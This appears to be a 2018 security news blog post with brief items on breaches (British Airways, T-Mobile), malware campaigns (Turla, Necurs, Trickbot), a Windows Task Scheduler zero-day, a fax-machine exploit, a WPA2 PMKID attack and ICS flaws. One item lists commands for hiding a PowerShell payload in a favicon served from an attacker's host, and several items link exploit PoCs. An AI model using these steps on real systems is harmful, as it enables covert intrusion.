PowerPool Malware Uses Windows Zero-Day Posted on Twitter

Read the complete story about how the criminals abused PowerPool for their own wins here at DarkReading and check the original tweet of Will Dorman.

Get the PoC from SandboxEscaper at GitHUB.

British Airways: Customer data theft

Around 380.000 personal data records have been stolen by unknown cyber criminals.

What data has been lost?

The personal and financial details of customers making bookings on ba.com and the airline’s mobile app between 22:58 BST August 21, 2018 and 21:45 BST September 5, 2018 was compromised. No passport or travel details were stolen.

Only customers who made bookings or changes to their bookings on ba.com and the airline’s mobile app between 22:58 BST August 21, 2018 and 21:45 BST September 5, 2018 are affected.

Names, billing address, email address and all bank card details were all at risk.

Are my saved credit card details safe if they were used made a booking in that period?

All payment transactions, using either new cards or saved cards, made on ba.com or the mobile app from 22:58 BST August 21, 2018 to 21:45 September 5, 2018 inclusive were impacted.

No Executive Club accounts were compromised in the data theft. There is no impact to Avios or details stored with the British Airways Executive Club.

Technical details about how all that worked can be found at the detailed report of:

Did you know that cyberchef from GCHQ is available via docker?

... well I didn't until I found https://isc.sans.edu/diary/24056

Have fun.  :-)

Discovering patterns in network traffic with silk

Manuel Humberto and Santander Pelaez did a cool writing about organizing the massive amount of network capture data with some neat tool. If you ever come accros analysing your net data for some stuff, this will help you a alot.

Android Banker with 190+ targeted banking apps unvieled

Lukas Stefanko has twittered that he unvieled a banker trojan in several apps.

The mitigation is "Don't trust apps from unknown sources"

Find a list of bad banking apps at pastebin.

Excellent links for our work

I found some very cool URL's that describe and link the tools we should all be aware of to ease our daily work.

Check out my extra page here.

Hackers Stole Personal Data of 2 Million T-Mobile Customers

Motherboard reports a data breach at T-Mobile that revealed 2 million user data.

According to two different security researchers, with whom Motherboard shared that hash, it may be an encoded string hashed with the notoriously weak algorithm called MD5, which can potentially be cracked with brute-forcing attacks.

And still they have not learned how to spell security at Big-T.  LOL
Anyway, if you use this provider or one of it's subsidaries, rather change your password soon.

Turla Threat Group Uses Email PDF Attachments to Control Stealthy Backdoor

Erik found a cool article from DarkReading that tells us about a new way of Turlas C6C communication via mailed PDF's.
Remember how APT28 broke into the Germen Foreign Ministry, well this is just another way of obfuscating C6C via mail.

"The backdoor is designed to monitor all incoming and outgoing emails from the compromised system and to collect message metadata about the sender, recipient, subject, and attachment name (if any). The data is compiled in logs that are then bundled together and sent periodically to Turla operators in specially crafted PDF documents attached to emails.

The Outlook backdoor also checks all incoming email for PDFs that might contain commands from the attackers. The malware is designed to accept commands from any threat actor that is able to encode them in the right format in a PDF document. If the email address to which the malware typically transmits stolen data is blocked, the threat actor can regain control of the backdoor simply by sending a rogue PDF with a new C2 address.

The main difference from other backdoors is that the operator can initiate the communication with the backdoor while the malware is inspecting emails being downloaded automatically to the inbox,

(Linux) TCP implementations vulnerable to Denial of Service

Again the Carnegie Mellon Universoty is reporting:

Vulnerability Note VU#962459

Description

Impact

Solution

Vendor Information (Learn More)

If you are a vendor and your product is affected, let us know.View More »

CVSS Metrics

References

• https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=1a4f14bab1868b443f0dd3c55b689a478f82e72e
• https://www.spinics.net/lists/netdev/msg514742.html
• https://www.freebsd.org/security/advisories/FreeBSD-SA-18:08.tcp.asc

0-Day: Microsoft Windows task scheduler contains a local privilege escalation vulnerability in the ALPC interface

The Carnegie Mellon University reports:

Vulnerability Note VU#906424

CVSS Metrics

References

• https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
• https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f

As per Kevin Beumont:

High level overview

• Needs prior code execution to exploit.
• Exploit currently only works on 64-bit OSes (likely Win 10 and Server 2016).

What is it the flaw?

“_SchRpcSetSecurity which is part of the task scheduler ALPC endpoint allows us to set an arbitrary DACL. It will Set the security of a file in c:\windows\tasks without impersonating, a non-admin (works from Guest too) user can write here. Before the task scheduler writes the DACL we can create a hard link to any file we have read access over. This will result in an arbitrary DACL write. This PoC will overwrite a printer related dll and use it as a hijacking vector. This is ofcourse one of many options to abuse this.” — source

Ways to detect

• If you use Microsoft Sysmon, look for spoolsv.exe spawning abnormal processes — it’s a sure sign this exploit is being used (or another Spooler exploit). Similarly if you use Sysmon, look for conhost.exe (Task Scheduler) spawning under abnormal processes (e.g. the Print Spooler).

Ways to mitigate

• Antivirus, segmentation, don’t allow untrusted users to run code.

Ways to fix

• Microsoft need to fix the function. This will probably happen in a few weeks.

SamSam: The (Almost) Six Million Dollar Ransomware

Sophos has published an excelent analysis report about an "outstanding" ransomware.

Necurs Targeting Banks with PUB File that Drops FlawedAmmyy

Cofense reports another bank targeted campain was rolling from 7:30 EST on Aug 15 until 15:37 EST. So plerase check your LMS for "Request BOI” or “Payment Advice <random alpha numeric>” findings that could be related to that campain.

As per Cofense:
Necurs is a rootkit first observed in 2012. It utilizes multiple Domain Generation Algorithms (DGA’s) coupled with .bit domain names as well as P2P communications to remain resilient against shutdown. Necurs became fairly famous when it began sending waves of Dridex and Locky a few years ago.  We have noticed an uptick in campaigns originating from the Necurs botnet in recent weeks.

What stood out today is what changed. Necurs for months has been sending a seemingly never-ending stream of typical spam campaigns. Today at 7:30am EST we noticed a new file extension attached to its phishing campaigns: .PUB, which belongs to Microsoft Publisher.  Like Word and Excel, Publisher has the ability to embed macros. So just when you are feeling confident about a layered defense protecting you from Malicious Word docs, Necurs adapts and throws you a curveball.

The other eyebrow-raising moment is when it was observed that all of the recipients worked for banks. There were no free mail providers in this campaign, signaling clear intent by the attackers to infiltrate banks specifically.

The emails are fairly basic and appear to be coming from someone in India with the subject of “Request BOI” or “Payment Advice <random alpha numeric>”.

How to embed a powershell meterpreter into your favicon.ico

This reads like a charm and will stay completly unter the radar when accessing a malicouse site that has a malformed favicon.

Read the post of Penetration Testing Labs.

In short:

Using - KALI:
• echo 'mkdir halloworld' > shellcode.txt
• python create_favicon.py shellcode.txt evil.png
• service apache2 start
• mv evil.png /var/www/html/favicon.ico

Using - Windows:
• Powershell with admin rights
◦ SetExecutionPolicy unrestricted
◦ ImportModule .\readFavicon.ps1
◦ GetFaviconText -URL http://192.168.10.99/favicon.ico -WriteTo $env:TEMP

Hacking the Fax (by Checkpoint research)

I personally love when things come true you have not thought before.

In the below POC, Checkpoint shows us how the break a common All-In-one-FAX machine via the analog phone line.
The technical article of the researchers is wort reading as it gives the interested party a lot of insights how these machines are build and what cheap devices we all have in our network.

This all comes to live by the fact that a color-fax is directly written into a corresponding JPG-file without any sanitizing the data. The FAX-Machine then processing this file ends up in a buffer overflow and can be used to own the complete FAX-Machine.
One owning the device, an eternal-blue is used to compromise machines on the IP-Network attached to the FAX.

This might open a complete new way of attack, as the FAX-Machine is assumed of not being to become an entry into the network at all. By that, they are not specially secured and are usually not specially segregated from other important devices.

My personal respect to the research team for finding this vuln.  ;-)

Airbus - We make it fly ...

Airbus Zephyr S (a High Altutude Pseudo-Satelite to provide a low orbit Internet access in future) reached a new world rekord as longest solar powered flight (26 days) ever.

Read TheEngeneer:

Taking off on 11th July in Arizona, USA, the unmanned Zephyr S HAPS (High Altitude Pseudo-Satellite) was airborne for 25 days, 23 hours and 57 minutes, a duration Airbus hopes to have confirmed as a world record in the coming days. Zephyr employs a 25m wingspan covered in solar panels to power its flight and charge its lithium-sulphur batteries, allowing it to cruise in the stratosphere for extreme lengths of time.

I'm proud to be an Airbus'er ... !!!

WPA2 is dead, long life WPA2

Jens Steube was analyzing the new WPA3 protocol for security weaknesses and "accidentally" found some extreme vulnerability he observed in the WPA2 PSK RSN PMKID function.

Jens is sharing the tools and a POC at hashcat for educational purpose.

While the "old" technique was limited by having to capture a complete EAPOL 4-Way-handshake sequence, the "new" way, only needs to get hold of a single EAPOL-frame.

His comment on hashcat especially emphasis the new enhancements of his technique as:

The main advantages of this attack are as follow:

• No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack)
• No more waiting for a complete 4-way handshake between the regular user and the AP
• No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
• No more eventual invalid passwords sent by the regular user
• No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
• No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
• No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string

For me personally, this asks for a proof of concept braking into my own WLAN at the next free time I find. - So stay tuned.

Hackers gain access to thousands of Swiss email accounts

The Swiss "Sontaszeitung" (sunday newspaper) is reporting, that around 15000 Swiss email accounts "belonged to employees of various state administration bodies, companies close to the state, universities, and other official organizations." (as SwissInfo reports), are used to blackmail owners.

The problem besides the reputational and informational issues such an attack has, is more the fact that these information can/will be used in phishing and other attempts to infiltrate further entities. Especially state-related companies as the (in)famous RUAG might be in danger (again). As already happened at RUAG in 2016.

So please, don't use your office mail to do private stuff and
be vigilant when opening mail (even from known senders).

Banking: Trickbot campaign spoofing Chase Bank “Important account documents”

Did you see this email in your inbox?

DO NOT OPEN, it's trying to foul you.  :-)

ICS/SCADA: Flaws Expose Siemens Protection Relays to DoS Attacks (TCP:102)

 Read the SecurityWeeks article here.

Siemens has informed customers that some of the company’s SIPROTEC protection relays are exposed to denial-of-service (DoS) attacks due to a couple of vulnerabilities present in the EN100 communication module.

Researchers at ScadaX, an independent group of experts focusing on ICS and IoT security, discovered that the EN100 module and SIPROTEC 5 relays are impacted by two DoS vulnerabilities that can be exploited by sending specially crafted packets to the targeted device’s TCP port 102.

Exploitation of the flaws causes the device’s network functionality to enter a DoS condition, which Siemens says compromises the system’s availability. Manual intervention is required to restore the impacted service.

An attacker needs access to the targeted organization’s network and IEC 61850-MMS communication needs to be enabled in order to exploit the flaws, but no user interaction is required.

The vulnerabilities are similar, but one of them, tracked as CVE-2018-11451, has been classified as “high severity,” while the other, CVE-2018-11452, which impacts the EN100 module if oscilographs are running, has been rated “medium severity.” Siemens noted that SIPROTEC 5 relays are only affected by the more serious flaw.

See a quick shodan view of TCP:102 open to the Internet

ICS/SCADA: Ukraine Security Service Stops VPNFilter Attack at Chlorine Station

Another ICS/SCADA topic, the DARKReading is writing about.

Interfax-Ukraine reported that the LLC Aulska station in Auly was hit with a VPNFilter infection intended to disrupt operations at the chlorine station.  

"Specialists of the cyber security service established minutes after [the incident] that the enterprise's process control system and system for detecting signs of emergencies had deliberately been infected by the VPNFilter computer virus originating from Russia. The continuation of the cyber attack could have led to a breakdown in technological processes and a possible accident," the SBU wrote on its Facebook page, according to the report.

[....]

ICS/SCADA expert Robert Lee says the initial reports out of Ukraine don't provide sufficient details to confirm the attack could have caused a physical attack. "What we know right now about VPNFilter indicates that there was nothing in the malware to support the scenario of physical damage and operational impact that was described," says Lee, CEO and founder of Dragos.

He says there are other possible scenarios for a physical attack, such as the attackers "directly using that access," but the SBU's report doesn't specifically indicate that.

"In this case we need more details," he says. "Obviously the SBU is doing good work, but the rest of the community would benefit from more insight, as the scenario presented leaves many questions."